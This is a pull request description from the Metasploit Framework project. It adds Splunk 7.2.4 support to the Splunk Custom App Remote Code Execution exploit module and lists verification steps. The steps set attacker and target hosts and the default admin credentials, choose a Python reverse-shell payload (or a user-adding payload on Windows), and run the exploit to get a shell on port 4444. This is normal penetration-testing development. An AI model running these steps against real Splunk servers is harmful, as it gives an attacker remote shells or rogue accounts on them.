rapid7/metasploit-framework
# Add support for splunk 7.2.4 to 'Splunk Custom App Remote Code Execution

Hi
I have been working on integrating some changes to the 'Splunk Custom App Remote Code Execution' and including support for splunk 7.2.4 (it might even work on the whole 7 train up to 7.2.4)
Verification steps

- [x] use exploit/multi/http/splunk_upload_app_exec
- [x] set required variables (you will need admin credentials)
```
SET LHOST 192.168.1.2
SET RHOST 192.168.1.1
SET USERNAME admin
SET PASSWORD changeme
```
- [x] If targeting linux or macos, the payload will be set automatically to 'cmd/unix/reverse_python '

- [ ] If targeting windows, the 'adduser' payload is automatically selected, since we do not have an available python reverse shell payload

- [x] 'run' or 'exploit' and you should expect reverse shell connection on port 4444 (or a new user added in case of windows)

It has been tested successfully on both linux,macos (windows does not support python reverse shell but all the other available commands are working as expected)
